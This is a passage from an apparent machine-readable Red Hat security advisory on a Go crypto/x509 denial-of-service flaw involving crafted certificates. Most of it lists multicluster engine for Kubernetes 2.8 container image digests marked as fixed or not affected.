"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
